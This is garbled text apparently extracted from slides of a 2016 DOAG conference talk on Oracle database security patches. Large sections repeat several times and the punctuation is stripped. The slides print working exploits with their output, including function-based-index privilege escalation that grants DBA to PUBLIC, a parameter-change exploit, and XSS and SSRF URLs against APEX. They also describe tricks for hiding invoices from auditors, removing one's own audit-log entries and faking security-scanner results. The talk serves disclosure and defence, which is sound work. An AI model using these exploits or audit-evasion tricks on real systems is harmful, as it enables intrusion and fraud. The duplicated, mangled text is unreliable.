==gt CREATE ANY LIBRARY Privilege is granted to SYSMAN_APM SQLgtselect from user_role_privs USERNAME GRANTED_ROLE ADM DEF OS_ ------------------------------ ------------------------------ --- --- --- SYSMAN_APM CONNECT NO YES NO SYSMAN_APM RESOURCE NO YES NO
==gt Create a function GETDBA to escalate privileges using AUTHID CURRENT_USER SQLgtCREATE OR REPLACE FUNCTION GETDBA(FOO VARCHAR) RETURN VARCHAR DETERMINISTIC AUTHID CURRENT_USER IS 2 PRAGMA AUTONOMOUS_TRANSACTION 3 BEGIN 4 execute immediate grant dba to public 5 COMMIT 6 RETURN FOO 7 END 8 ==gt Grant execution privileges to PUBLIC SQLgt grant execute on getdba to public
==gt Create an index on SYSTEMHELP using a function based index (FBI) The function getdba is used for the function based index SQLgt CREATE INDEX EXPLOIT_INDEX ON SYSTEMHELP(SYSMAN_APMGETDBA(AK2))
==gt Reconnect is necessary SQLgt select from dba_role_privs where granted_role=DBA and grantee=PUBLIC GRANTEE GRANTED_ROLE ADM DEF ------------------------------ ------------------------------ --- --- PUBLIC DBA NO YES
November 2016
DOAG 2016
Modifying SQL Statements and Application Logic
Scenario 1
Top manager comes to the office of the DBA
and asks youbdquoTomorrow the auditor from the tax authority will
come to check our invoices Could you hide the
10000 EUR invoice just from the auditor from the
last party at the night clubI will increase your salaryhellipldquo
Scenario 2
Remove your own audit entries from the audit
log which is retrieved by the SIEM solution (eg
Splunk QRadar hellip) via JDBC
Scenario 3
You donrsquot have time to harden all your
databases but the security department wants to
see resultsInstead of fixing the problem you will just deliver
the proper results
A lot of different wisheshellip
but luckily we are using Oracle
ProblemampSolution
Oracle offers different features to fulfill these
wishes without affecting other usershellip
All these scenarios have in common that we
have to manipulate SQL statement
Select value hellip
Oracle Data Redaction allows to mask
manipulate the selected data just for a single
database user
Possible Usage replace truefalse replace USERADMINhellip
the DBA can decide what will be returned
Select value hellip
A typical query from security checklistsscanner looks
like this select upper(value) from parameter where upper(name) = XYZ
The tool expects the value TRUE but it contains FALSE
Oracle data redaction allows you to change the
result value from FALSE to TRUE==gt Audit department is happy because the database passes all the security checkshellip
hellip from tableview hellip
Modifying objects can change be used as man
in the middle as well
Possible approaches
modify views (eg add spare=DBA1 to the view dba_audit_trail)All entries of the OSUSER DBA1 will be removed in the view If a SIEM solution retrieves the audit data stuff from DBA1 is not retrieved
create or change synonyms to bdquoredirectldquo objects
replace table with viewinstead of trigger
mdashmdashmdashmdashmdash dbms_macadmmdashmdashmdashmdashmdash FUNCTION CHECK_BACKUP_PARM_VARCHAR RETURN VARCHAR2 IS TMP VARCHAR2(32767) TMP2 VARCHAR2(32767)
BEGIN SELECT DVSYSDV_SQL_TEXT INTO TMP FROM DUAL IF LENGTH(TMP) = 4000 THEN RETURN rsquoN END IF TMP2 = UPPER(TMP) IF (TMP2) LIKE RECYCLEBIN AND (TMP2) LIKE ON THEN RETURN N END IF RETURN Y END
SQLgt create or replace view mydual as select X as dummy from dual where user=DVSYS
SQLgt grant select on sysmydual to public SQLgt drop public synonym dual SQLgt create public synonym dual for sysmydual
SYS CAN INFLUENCE DVSYS-ANALYSIS VIA VIEW NAMED DUAL
Red Attack - Die Katastrophe in der Datenbank (Gunther Pipperr)
hellip where x=y
where conditions can be changed using VPD
VPD add where clauseinvoice_name = SAUNA_CLUB CHANTAL
Hide bdquocertainldquo invoices from the audit
department
Select value from tableview where x=y
SQL Translation Framework (12c only) allows to
replace an entire queryUser submits Query A SQL Translation Framework replaces Query A
with Query B
Possible Countermeasures for paranoid Auditors
Add a random string eg aksdjhiuz to avoid
SQL Translation Framework (new SQLID)
Try to get EXEMPT ACCESS POLICY to disable
VPD (even if not used in the application)
Use full qualified names instead of synonyms(eg SYSDUAL instead of DUAL)
Always check the object type (is is really a table)
Use checksums for certain database objects
(especially views)
Check the current schema to avoid attacks
(eg alter session set current_schema=otheruser)
Modifying Queries on the fly
Powerful features for application
(Huge) potential on critical systems to modify
application logic (eg DB Vault)
DBAs and AuditorsSecurity Department should
be aware of powerful Oracle features which
could be used to modify application logic
Audit these features even if not in use
Trends 2017
New hardening documents for Oracle 122
required (new features new packages hellip)
Migration to 122
More auditing projects
Integration Auditing with SIEM solutions
Q amp A
Thank you Contact
Red-Database-Security GmbH
Eibenweg 42
D-63150 Heusenstamm
Germany
July 2016 CPU
9 security fixes (5 remote exploitable)
1 OJVM (CVSS 90)
1 JDBC (CVSS 81 remote)
1 Portable Clusterware (CVSS 75 remote)
1 Data Pump (CVSS 67)
2 APEX (CVSS 61 58 2 remote)
1 RDBMS Security (CVSS 53 remote)
DB Shardening (CVSS 44)
1 Database Vault (CVSS 34)
httpwwworaclecomtechnetworksecurity-advisorycpujul2016-2881720html
Jul 2016 CPU- CVE-2016-3448
httpwwwdavidlitchfieldcomOracleCPUApril2016pdf
Problem The HTMLDB_UTIL PLSQL package is
vulnerable to a XSS flaw To access it the
schema (APEX_050000) needs to be specified
first however because the config file whitelists
apex
Reporter David Litchfield
Exploit
httpexamplecomordsapex_050000htmldb_utilJSON_FROM_ARRAYP_COLS=1ampP_NAM E01=XX223E3CH13EOops3CH13EampP_F01=YampP_ROWS=1
Jul 2016 CPU- CVE-2016-3467
httpwwwdavidlitchfieldcomOracleCPUApril2016pdf
Problem Apex 5 is vulnerable to a server side
request forgery flaw ie it can be made to connect
to another web server and port regardless of
whether allowed URLs have been configured For
example the request below will connect to
someotherserver on port and POST X as a payload
This can be used as a port scanning mechanism
used to attack systems protected by a firewall etc
Reporter David Litchfield
Exploit
httpexampleordsapex_050000WWV_FLOW_WEBSERVICES_APIMAKE_REQUESTP_U RL=httpsomeotherserverportampp_envelope=X
Apr 2016 CPU- CVE-2016-3488Problem Package dbms_gsm_common allows
to change database parameter without the
admin privileges and restart
Reporter Bruno Cirone
Exploit
exec gsmadmin_internaldbms_gsm_commonsetdbparameter (O7_DICTIONARY_ACCESSIBILITYTRUE)
Jul 2016 CPU- CVE-2016-3488mdash as SYS SQLgt select namevalue from v$parameter where name=O7_DICTIONARY_ACCESSIBILITY O7_DICTIONARY_ACCESSIBILITY FALSE -- as user GSMUSER SQLgt exec gsmadmin_internaldbms_gsm_commonsetdbparameter (O7_DICTIONARY_ACCESSIBILITYTRUE) PLSQL-Prozedur erfolgreich abgeschlossen -- as user SYS -Re-Run again after execution of the package SQLgt select namevalue from v$parameter where name=O7_DICTIONARY_ACCESSIBILITY O7_DICTIONARY_ACCESSIBILITY TRUE
July 2016 CPU- CVE-2016-3484
Problem SYS CAN INFLUENCE DVSYS-ANALYSIS
Reporter Alexander Kornbrust
Problem (Details + Exploit laterhellip)
FUNCTION CHECK_BACKUP_PARM_VARCHAR RETURN VARCHAR2 IS TMP VARCHAR2(32767) TMP2 VARCHAR2(32767)
BEGIN SELECT DVSYSDV_SQL_TEXT INTO TMP FROM DUAL IF LENGTH(TMP) = 4000 THEN RETURN rsquoN END IF TMP2 = UPPER(TMP) IF (TMP2) LIKE RECYCLEBIN AND (TMP2) LIKE ON THEN RETURN N END IF RETURN Y END
July 2016 CPU- CVE-2016-3489
Problem Privilege escalation via INDEX privilege
and function based index (FBI)
Reporter Alexander Kornbrust
July 2016 CPU- CVE-2016-3489
mdash Oracle 11204 SYSTEMSQLgt select grantee owner table_name FROM DBA_TAB_PRIVS WHERE PRIVILEGE = INDEX AND GRANTEE=OWNER and owner=SYS GRANTEE OWNER TABLE_NAME -------------------------------------------------------------------------------------- SYSTEM SYS INCEXP SYSTEM SYS INCFIL SYSTEM SYS INCVID SYSTEMSQLgt CREATE OR REPLACE FUNCTION GETDBA(FOO VARCHAR) RETURN VARCHAR DETERMINISTIC AUTHID CURRENT_USER IS 2 PRAGMA AUTONOMOUS_TRANSACTION 3 BEGIN 4 execute immediate grant select on syslink$ to public 5 COMMIT 6 RETURN FOO 7 END
SQLgt grant execute on getdba to public
July 2016 CPU- CVE-2016-3489==gt System does not have access to the SYSLINK$ table SQLgt select count() from syslink$ ERROR at line 1 ORA-01031 insufficient privileges
==gt also the execution of getdba throws an errorSQLgt select getdba(i) from dual ERROR at line 1 ORA-01031 insufficient privileges ORA-06512 at SYSTEMGETDBA line 4 ==gt Now create an index on the table sysincvid using a function based index SQLgt CREATE INDEX EXPLOIT_INDEX ON SYSINCVID(SYSTEMGETDBA(AK)) Index created SQLgt select count() from syslink$ COUNT() ---------- 11
July 2016 CPU- CVE-2016-3489-- Oracle 12102 (SYSTEM does no longer have INHERIT ANY PRIVILEGE) SQLgt CREATE INDEX EXPLOIT_INDEX ON SYSINCvid(SYSTEMGETDBA(1)) CREATE INDEX EXPLOIT_INDEX ON SYSINCvid(SYSTEMGETDBA(1)) FEHLER in Zeile 1 ORA-06598 Nicht ausreichende INHERIT PRIVILEGES-Berechtigung ORA-06512 in SYSTEMGETDBA Zeile 1
-- On 12102 the user WMSYS has CREATE ANY INDEX and the SYSTEM user can use the -- CREATE ANY PROCEDURE to create a function in the schema of WMSYS
CREATE OR REPLACE FUNCTION wmsysGETDBA(FOO VARCHAR) RETURN VARCHAR DETERMINISTIC AUTHID CURRENT_USER IS PRAGMA AUTONOMOUS_TRANSACTION BEGIN execute immediate grant select on syslink$ to public COMMIT RETURN FOO END SQLgt grant execute on wmsysgetdba to public
-- now we create the index SQLgt CREATE INDEX EXPLOIT_INDEX ON SYSINCVID(WMSYSGETDBA(AK))
August 2016Hackproofing Oraclersquos eBusiness Suite by David
Litchfield
Presentation + Supporting documents
httpswwwblackhatcomdocsus-16materialsus-16-Litchfield-Hackproofing-Oracle-eBusiness-Suitepdfhttpswwwblackhatcomdocsus-16materialsus-16-Litchfield-Hackproofing-Oracle-eBusiness-Suite-wp-1pdfhttpswwwblackhatcomdocsus-16materialsus-16-Litchfield-Hackproofing-Oracle-eBusiness-Suite-wp-2pdfhttpswwwblackhatcomdocsus-16materialsus-16-Litchfield-Hackproofing-Oracle-eBusiness-Suite-wp-3pdfhttpswwwblackhatcomdocsus-16materialsus-16-Litchfield-Hackproofing-Oracle-eBusiness-Suite-wp-4pdfhttpswwwblackhatcomdocsus-16materialsus-16-Litchfield-Hackproofing-Oracle-eBusiness-Suite-wp-5pdf
September 2016iexcl Nothing special happened
x
October 2016
Oracle CPU October 2016
httpwwworaclecomtechnetworksecurity-advisorycpuoct2016-2881722html
October 2016 CPU
9 security fixes (1 remote exploitable)
1 OJVM (CVSS 91)
2 KernelPDB (CVSS 6460)
3 RDBMS Security (CVSS 64 33 33)
1 APEX (CVSS 61 remote)
1 RDBMS Security amp SQLPlus (CVSS 24)
httpwwworaclecomtechnetworksecurity-advisorycpuoct2016-2881722html
Oct 2016 CPU- CVE-2016-5497
Problem UNSALTED MD5 HASH STILL PRESENT IN
12C DATABASE - DIGEST VERIFIER
Shown as open problem at the DOAG 2015
presentation
Reporter Alexander Kornbrust
Oracle Password Hash 12102+
Oracle 12102 introduced a new PBKDF2
SHA512 based algorithm
The new T Password hash is 10 times slower than
the old DES hash (Oracle 7+) and 88 times slower
than the SHA1-based hash (Oracle 11+)
The new algorithm is known and already
implemented in some tools
Remark Microsoft Office 2013 is 10 times more
time consuming to crack than the new Oracle
PBKDF2
Oracle Password Hash 12102+
Letrsquos have a look at the RFC2617
KD(secret data) = H(concat(secret data))
No salt but a secret
Secret= XDBlsquo
and the hash will be MD5(XDBtiger)
and stored in the spare4-column starting with the HHash
Oct 2016 CPU- CVE-2016-5516
Problem In Oracle 12c the DBMS_PDB_EXEC_SQL
procedure is a wrapper for the
DBMS_PDBEXEC_AS_ORACLE_SCRIPT procedure which executes SQL as the SYS user The XDB user has the execute privilege on
DBMS_PDB_EXEC_SQL and as such by first exploiting
a vulnerability in a publicly executable XDB owned PLSQL object an attacker can leverage this
privilege to execute SQL as SYS The fix changes both
DBMS_PDB_EXEC_SQL and DBMS_PDB from using the
DEFINER rights to the INVOKER rights execution model Reporter David Litchfield
Oct 2016 CPU- CVE-2016-5604
Problem Privilege Escalation in Oracle Cloud
Control (1213)
Reporter Alexander Kornbrust
sqlplus sysman_apmrdsora1 SQLgtdesc dba_users ERROR ORA-04043 object SYSDBA_USERS does not exist
==gt user does not have the privilege to access DBA_USERS SQLgtselect from user_sys_privs USERNAME PRIVILEGE ADM ------------------------------ ---------------------------------------- --- SYSMAN_APM UNLIMITED TABLESPACE NO SYSMAN_APM CREATE VIEW NO SYSMAN_APM CREATE ANY LIBRARY NO SYSMAN_APM CREATE SEQUENCE NO SYSMAN_APM CREATE TABLE NO SYSMAN_APM CREATE LIBRARY NO SYSMAN_APM CREATE ANY INDEX NO
==gt CREATE ANY LIBRARY Privilege is granted to SYSMAN_APM SQLgtselect from user_role_privs USERNAME GRANTED_ROLE ADM DEF OS_ ------------------------------ ------------------------------ --- --- --- SYSMAN_APM CONNECT NO YES NO SYSMAN_APM RESOURCE NO YES NO
==gt Create a function GETDBA to escalate privileges using AUTHID CURRENT_USER SQLgtCREATE OR REPLACE FUNCTION GETDBA(FOO VARCHAR) RETURN VARCHAR DETERMINISTIC AUTHID CURRENT_USER IS 2 PRAGMA AUTONOMOUS_TRANSACTION 3 BEGIN 4 execute immediate grant dba to public 5 COMMIT 6 RETURN FOO 7 END 8 ==gt Grant execution privileges to PUBLIC SQLgt grant execute on getdba to public
==gt Create an index on SYSTEMHELP using a function based index (FBI) The function getdba is used for the function based index SQLgt CREATE INDEX EXPLOIT_INDEX ON SYSTEMHELP(SYSMAN_APMGETDBA(AK2))
==gt Reconnect is necessary SQLgt select from dba_role_privs where granted_role=DBA and grantee=PUBLIC GRANTEE GRANTED_ROLE ADM DEF ------------------------------ ------------------------------ --- --- PUBLIC DBA NO YES
November 2016
DOAG 2016
Modifying SQL Statements and Application Logic
Scenario 1
Top manager comes to the office of the DBA
and asks youbdquoTomorrow the auditor from the tax authority will
come to check our invoices Could you hide the
10000 EUR invoice just from the auditor from the
last party at the night clubI will increase your salaryhellipldquo
Scenario 2
Remove your own audit entries from the audit
log which is retrieved by the SIEM solution (eg
Splunk QRadar hellip) via JDBC
Scenario 3
You donrsquot have time to harden all your
databases but the security department wants to
see resultsInstead of fixing the problem you will just deliver
the proper results
A lot of different wisheshellip
but luckily we are using Oracle
ProblemampSolution
Oracle offers different features to fulfill these
wishes without affecting other usershellip
All these scenarios have in common that we
have to manipulate SQL statement
Select value hellip
Oracle Data Redaction allows to mask
manipulate the selected data just for a single
database user
Possible Usage replace truefalse replace USERADMINhellip
the DBA can decide what will be returned
Select value hellip
A typical query from security checklistsscanner looks
like this select upper(value) from parameter where upper(name) = XYZ
The tool expects the value TRUE but it contains FALSE
Oracle data redaction allows you to change the
result value from FALSE to TRUE==gt Audit department is happy because the database passes all the security checkshellip
hellip from tableview hellip
Modifying objects can change be used as man
in the middle as well
Possible approaches
modify views (eg add spare=DBA1 to the view dba_audit_trail)All entries of the OSUSER DBA1 will be removed in the view If a SIEM solution retrieves the audit data stuff from DBA1 is not retrieved
create or change synonyms to bdquoredirectldquo objects
replace table with viewinstead of trigger
mdashmdashmdashmdashmdash dbms_macadmmdashmdashmdashmdashmdash FUNCTION CHECK_BACKUP_PARM_VARCHAR RETURN VARCHAR2 IS TMP VARCHAR2(32767) TMP2 VARCHAR2(32767)
BEGIN SELECT DVSYSDV_SQL_TEXT INTO TMP FROM DUAL IF LENGTH(TMP) = 4000 THEN RETURN rsquoN END IF TMP2 = UPPER(TMP) IF (TMP2) LIKE RECYCLEBIN AND (TMP2) LIKE ON THEN RETURN N END IF RETURN Y END
SQLgt create or replace view mydual as select X as dummy from dual where user=DVSYS
SQLgt grant select on sysmydual to public SQLgt drop public synonym dual SQLgt create public synonym dual for sysmydual
SYS CAN INFLUENCE DVSYS-ANALYSIS VIA VIEW NAMED DUAL
Red Attack - Die Katastrophe in der Datenbank (Gunther Pipperr)
hellip where x=y
where conditions can be changed using VPD
VPD add where clauseinvoice_name = SAUNA_CLUB CHANTAL
Hide bdquocertainldquo invoices from the audit
department
Select value from tableview where x=y
SQL Translation Framework (12c only) allows to
replace an entire queryUser submits Query A SQL Translation Framework replaces Query A
with Query B
Possible Countermeasures for paranoid Auditors
Add a random string eg aksdjhiuz to avoid
SQL Translation Framework (new SQLID)
Try to get EXEMPT ACCESS POLICY to disable
VPD (even if not used in the application)
Use full qualified names instead of synonyms(eg SYSDUAL instead of DUAL)
Always check the object type (is is really a table)
Use checksums for certain database objects
(especially views)
Check the current schema to avoid attacks
(eg alter session set current_schema=otheruser)
Modifying Queries on the fly
Powerful features for application
(Huge) potential on critical systems to modify
application logic (eg DB Vault)
DBAs and AuditorsSecurity Department should
be aware of powerful Oracle features which
could be used to modify application logic
Audit these features even if not in use
Trends 2017
New hardening documents for Oracle 122
required (new features new packages hellip)
Migration to 122
More auditing projects
Integration Auditing with SIEM solutions
Q amp A
Thank you Contact
Red-Database-Security GmbH
Eibenweg 42
D-63150 Heusenstamm
Germany
Jul 2016 CPU- CVE-2016-3448
httpwwwdavidlitchfieldcomOracleCPUApril2016pdf
Problem The HTMLDB_UTIL PLSQL package is
vulnerable to a XSS flaw To access it the
schema (APEX_050000) needs to be specified
first however because the config file whitelists
apex
Reporter David Litchfield
Exploit
httpexamplecomordsapex_050000htmldb_utilJSON_FROM_ARRAYP_COLS=1ampP_NAM E01=XX223E3CH13EOops3CH13EampP_F01=YampP_ROWS=1
Jul 2016 CPU- CVE-2016-3467
httpwwwdavidlitchfieldcomOracleCPUApril2016pdf
Problem Apex 5 is vulnerable to a server side
request forgery flaw ie it can be made to connect
to another web server and port regardless of
whether allowed URLs have been configured For
example the request below will connect to
someotherserver on port and POST X as a payload
This can be used as a port scanning mechanism
used to attack systems protected by a firewall etc
Reporter David Litchfield
Exploit
httpexampleordsapex_050000WWV_FLOW_WEBSERVICES_APIMAKE_REQUESTP_U RL=httpsomeotherserverportampp_envelope=X
Apr 2016 CPU- CVE-2016-3488Problem Package dbms_gsm_common allows
to change database parameter without the
admin privileges and restart
Reporter Bruno Cirone
Exploit
exec gsmadmin_internaldbms_gsm_commonsetdbparameter (O7_DICTIONARY_ACCESSIBILITYTRUE)
Jul 2016 CPU- CVE-2016-3488mdash as SYS SQLgt select namevalue from v$parameter where name=O7_DICTIONARY_ACCESSIBILITY O7_DICTIONARY_ACCESSIBILITY FALSE -- as user GSMUSER SQLgt exec gsmadmin_internaldbms_gsm_commonsetdbparameter (O7_DICTIONARY_ACCESSIBILITYTRUE) PLSQL-Prozedur erfolgreich abgeschlossen -- as user SYS -Re-Run again after execution of the package SQLgt select namevalue from v$parameter where name=O7_DICTIONARY_ACCESSIBILITY O7_DICTIONARY_ACCESSIBILITY TRUE
July 2016 CPU- CVE-2016-3484
Problem SYS CAN INFLUENCE DVSYS-ANALYSIS
Reporter Alexander Kornbrust
Problem (Details + Exploit laterhellip)
FUNCTION CHECK_BACKUP_PARM_VARCHAR RETURN VARCHAR2 IS TMP VARCHAR2(32767) TMP2 VARCHAR2(32767)
BEGIN SELECT DVSYSDV_SQL_TEXT INTO TMP FROM DUAL IF LENGTH(TMP) = 4000 THEN RETURN rsquoN END IF TMP2 = UPPER(TMP) IF (TMP2) LIKE RECYCLEBIN AND (TMP2) LIKE ON THEN RETURN N END IF RETURN Y END
July 2016 CPU- CVE-2016-3489
Problem Privilege escalation via INDEX privilege
and function based index (FBI)
Reporter Alexander Kornbrust
July 2016 CPU- CVE-2016-3489
mdash Oracle 11204 SYSTEMSQLgt select grantee owner table_name FROM DBA_TAB_PRIVS WHERE PRIVILEGE = INDEX AND GRANTEE=OWNER and owner=SYS GRANTEE OWNER TABLE_NAME -------------------------------------------------------------------------------------- SYSTEM SYS INCEXP SYSTEM SYS INCFIL SYSTEM SYS INCVID SYSTEMSQLgt CREATE OR REPLACE FUNCTION GETDBA(FOO VARCHAR) RETURN VARCHAR DETERMINISTIC AUTHID CURRENT_USER IS 2 PRAGMA AUTONOMOUS_TRANSACTION 3 BEGIN 4 execute immediate grant select on syslink$ to public 5 COMMIT 6 RETURN FOO 7 END
SQLgt grant execute on getdba to public
July 2016 CPU- CVE-2016-3489==gt System does not have access to the SYSLINK$ table SQLgt select count() from syslink$ ERROR at line 1 ORA-01031 insufficient privileges
==gt also the execution of getdba throws an errorSQLgt select getdba(i) from dual ERROR at line 1 ORA-01031 insufficient privileges ORA-06512 at SYSTEMGETDBA line 4 ==gt Now create an index on the table sysincvid using a function based index SQLgt CREATE INDEX EXPLOIT_INDEX ON SYSINCVID(SYSTEMGETDBA(AK)) Index created SQLgt select count() from syslink$ COUNT() ---------- 11
July 2016 CPU- CVE-2016-3489-- Oracle 12102 (SYSTEM does no longer have INHERIT ANY PRIVILEGE) SQLgt CREATE INDEX EXPLOIT_INDEX ON SYSINCvid(SYSTEMGETDBA(1)) CREATE INDEX EXPLOIT_INDEX ON SYSINCvid(SYSTEMGETDBA(1)) FEHLER in Zeile 1 ORA-06598 Nicht ausreichende INHERIT PRIVILEGES-Berechtigung ORA-06512 in SYSTEMGETDBA Zeile 1
-- On 12102 the user WMSYS has CREATE ANY INDEX and the SYSTEM user can use the -- CREATE ANY PROCEDURE to create a function in the schema of WMSYS
CREATE OR REPLACE FUNCTION wmsysGETDBA(FOO VARCHAR) RETURN VARCHAR DETERMINISTIC AUTHID CURRENT_USER IS PRAGMA AUTONOMOUS_TRANSACTION BEGIN execute immediate grant select on syslink$ to public COMMIT RETURN FOO END SQLgt grant execute on wmsysgetdba to public
-- now we create the index SQLgt CREATE INDEX EXPLOIT_INDEX ON SYSINCVID(WMSYSGETDBA(AK))
August 2016Hackproofing Oraclersquos eBusiness Suite by David
Litchfield
Presentation + Supporting documents
httpswwwblackhatcomdocsus-16materialsus-16-Litchfield-Hackproofing-Oracle-eBusiness-Suitepdfhttpswwwblackhatcomdocsus-16materialsus-16-Litchfield-Hackproofing-Oracle-eBusiness-Suite-wp-1pdfhttpswwwblackhatcomdocsus-16materialsus-16-Litchfield-Hackproofing-Oracle-eBusiness-Suite-wp-2pdfhttpswwwblackhatcomdocsus-16materialsus-16-Litchfield-Hackproofing-Oracle-eBusiness-Suite-wp-3pdfhttpswwwblackhatcomdocsus-16materialsus-16-Litchfield-Hackproofing-Oracle-eBusiness-Suite-wp-4pdfhttpswwwblackhatcomdocsus-16materialsus-16-Litchfield-Hackproofing-Oracle-eBusiness-Suite-wp-5pdf
September 2016iexcl Nothing special happened
x
October 2016
Oracle CPU October 2016
httpwwworaclecomtechnetworksecurity-advisorycpuoct2016-2881722html
October 2016 CPU
9 security fixes (1 remote exploitable)
1 OJVM (CVSS 91)
2 KernelPDB (CVSS 6460)
3 RDBMS Security (CVSS 64 33 33)
1 APEX (CVSS 61 remote)
1 RDBMS Security amp SQLPlus (CVSS 24)
httpwwworaclecomtechnetworksecurity-advisorycpuoct2016-2881722html
Oct 2016 CPU- CVE-2016-5497
Problem UNSALTED MD5 HASH STILL PRESENT IN
12C DATABASE - DIGEST VERIFIER
Shown as open problem at the DOAG 2015
presentation
Reporter Alexander Kornbrust
Oracle Password Hash 12102+
Oracle 12102 introduced a new PBKDF2
SHA512 based algorithm
The new T Password hash is 10 times slower than
the old DES hash (Oracle 7+) and 88 times slower
than the SHA1-based hash (Oracle 11+)
The new algorithm is known and already
implemented in some tools
Remark Microsoft Office 2013 is 10 times more
time consuming to crack than the new Oracle
PBKDF2
Oracle Password Hash 12102+
Letrsquos have a look at the RFC2617
KD(secret data) = H(concat(secret data))
No salt but a secret
Secret= XDBlsquo
and the hash will be MD5(XDBtiger)
and stored in the spare4-column starting with the HHash
Oct 2016 CPU- CVE-2016-5516
Problem In Oracle 12c the DBMS_PDB_EXEC_SQL
procedure is a wrapper for the
DBMS_PDBEXEC_AS_ORACLE_SCRIPT procedure which executes SQL as the SYS user The XDB user has the execute privilege on
DBMS_PDB_EXEC_SQL and as such by first exploiting
a vulnerability in a publicly executable XDB owned PLSQL object an attacker can leverage this
privilege to execute SQL as SYS The fix changes both
DBMS_PDB_EXEC_SQL and DBMS_PDB from using the
DEFINER rights to the INVOKER rights execution model Reporter David Litchfield
Oct 2016 CPU- CVE-2016-5604
Problem Privilege Escalation in Oracle Cloud
Control (1213)
Reporter Alexander Kornbrust
sqlplus sysman_apmrdsora1 SQLgtdesc dba_users ERROR ORA-04043 object SYSDBA_USERS does not exist
==gt user does not have the privilege to access DBA_USERS SQLgtselect from user_sys_privs USERNAME PRIVILEGE ADM ------------------------------ ---------------------------------------- --- SYSMAN_APM UNLIMITED TABLESPACE NO SYSMAN_APM CREATE VIEW NO SYSMAN_APM CREATE ANY LIBRARY NO SYSMAN_APM CREATE SEQUENCE NO SYSMAN_APM CREATE TABLE NO SYSMAN_APM CREATE LIBRARY NO SYSMAN_APM CREATE ANY INDEX NO
==gt CREATE ANY LIBRARY Privilege is granted to SYSMAN_APM SQLgtselect from user_role_privs USERNAME GRANTED_ROLE ADM DEF OS_ ------------------------------ ------------------------------ --- --- --- SYSMAN_APM CONNECT NO YES NO SYSMAN_APM RESOURCE NO YES NO
==gt Create a function GETDBA to escalate privileges using AUTHID CURRENT_USER SQLgtCREATE OR REPLACE FUNCTION GETDBA(FOO VARCHAR) RETURN VARCHAR DETERMINISTIC AUTHID CURRENT_USER IS 2 PRAGMA AUTONOMOUS_TRANSACTION 3 BEGIN 4 execute immediate grant dba to public 5 COMMIT 6 RETURN FOO 7 END 8 ==gt Grant execution privileges to PUBLIC SQLgt grant execute on getdba to public
==gt Create an index on SYSTEMHELP using a function based index (FBI) The function getdba is used for the function based index SQLgt CREATE INDEX EXPLOIT_INDEX ON SYSTEMHELP(SYSMAN_APMGETDBA(AK2))
==gt Reconnect is necessary SQLgt select from dba_role_privs where granted_role=DBA and grantee=PUBLIC GRANTEE GRANTED_ROLE ADM DEF ------------------------------ ------------------------------ --- --- PUBLIC DBA NO YES
November 2016
DOAG 2016
Modifying SQL Statements and Application Logic
Scenario 1
Top manager comes to the office of the DBA
and asks youbdquoTomorrow the auditor from the tax authority will
come to check our invoices Could you hide the
10000 EUR invoice just from the auditor from the
last party at the night clubI will increase your salaryhellipldquo
Scenario 2
Remove your own audit entries from the audit
log which is retrieved by the SIEM solution (eg
Splunk QRadar hellip) via JDBC
Scenario 3
You donrsquot have time to harden all your
databases but the security department wants to
see resultsInstead of fixing the problem you will just deliver
the proper results
A lot of different wisheshellip
but luckily we are using Oracle
ProblemampSolution
Oracle offers different features to fulfill these
wishes without affecting other usershellip
All these scenarios have in common that we
have to manipulate SQL statement
Select value hellip
Oracle Data Redaction allows to mask
manipulate the selected data just for a single
database user
Possible Usage replace truefalse replace USERADMINhellip
the DBA can decide what will be returned
Select value hellip
A typical query from security checklistsscanner looks
like this select upper(value) from parameter where upper(name) = XYZ
The tool expects the value TRUE but it contains FALSE
Oracle data redaction allows you to change the
result value from FALSE to TRUE==gt Audit department is happy because the database passes all the security checkshellip
hellip from tableview hellip
Modifying objects can change be used as man
in the middle as well
Possible approaches
modify views (eg add spare=DBA1 to the view dba_audit_trail)All entries of the OSUSER DBA1 will be removed in the view If a SIEM solution retrieves the audit data stuff from DBA1 is not retrieved
create or change synonyms to bdquoredirectldquo objects
replace table with viewinstead of trigger
mdashmdashmdashmdashmdash dbms_macadmmdashmdashmdashmdashmdash FUNCTION CHECK_BACKUP_PARM_VARCHAR RETURN VARCHAR2 IS TMP VARCHAR2(32767) TMP2 VARCHAR2(32767)
BEGIN SELECT DVSYSDV_SQL_TEXT INTO TMP FROM DUAL IF LENGTH(TMP) = 4000 THEN RETURN rsquoN END IF TMP2 = UPPER(TMP) IF (TMP2) LIKE RECYCLEBIN AND (TMP2) LIKE ON THEN RETURN N END IF RETURN Y END
SQLgt create or replace view mydual as select X as dummy from dual where user=DVSYS
SQLgt grant select on sysmydual to public SQLgt drop public synonym dual SQLgt create public synonym dual for sysmydual
SYS CAN INFLUENCE DVSYS-ANALYSIS VIA VIEW NAMED DUAL
Red Attack - Die Katastrophe in der Datenbank (Gunther Pipperr)
hellip where x=y
where conditions can be changed using VPD
VPD add where clauseinvoice_name = SAUNA_CLUB CHANTAL
Hide bdquocertainldquo invoices from the audit
department
Select value from tableview where x=y
SQL Translation Framework (12c only) allows to
replace an entire queryUser submits Query A SQL Translation Framework replaces Query A
with Query B
Possible Countermeasures for paranoid Auditors
Add a random string eg aksdjhiuz to avoid
SQL Translation Framework (new SQLID)
Try to get EXEMPT ACCESS POLICY to disable
VPD (even if not used in the application)
Use full qualified names instead of synonyms(eg SYSDUAL instead of DUAL)
Always check the object type (is is really a table)
Use checksums for certain database objects
(especially views)
Check the current schema to avoid attacks
(eg alter session set current_schema=otheruser)
Modifying Queries on the fly
Powerful features for application
(Huge) potential on critical systems to modify
application logic (eg DB Vault)
DBAs and AuditorsSecurity Department should
be aware of powerful Oracle features which
could be used to modify application logic
Audit these features even if not in use
Trends 2017
New hardening documents for Oracle 122
required (new features new packages hellip)
Migration to 122
More auditing projects
Integration Auditing with SIEM solutions
Q amp A
Thank you Contact
Red-Database-Security GmbH
Eibenweg 42
D-63150 Heusenstamm
Germany
Jul 2016 CPU- CVE-2016-3467
httpwwwdavidlitchfieldcomOracleCPUApril2016pdf
Problem Apex 5 is vulnerable to a server side
request forgery flaw ie it can be made to connect
to another web server and port regardless of
whether allowed URLs have been configured For
example the request below will connect to
someotherserver on port and POST X as a payload
This can be used as a port scanning mechanism
used to attack systems protected by a firewall etc
Reporter David Litchfield
Exploit
httpexampleordsapex_050000WWV_FLOW_WEBSERVICES_APIMAKE_REQUESTP_U RL=httpsomeotherserverportampp_envelope=X
Apr 2016 CPU- CVE-2016-3488Problem Package dbms_gsm_common allows
to change database parameter without the
admin privileges and restart
Reporter Bruno Cirone
Exploit
exec gsmadmin_internaldbms_gsm_commonsetdbparameter (O7_DICTIONARY_ACCESSIBILITYTRUE)
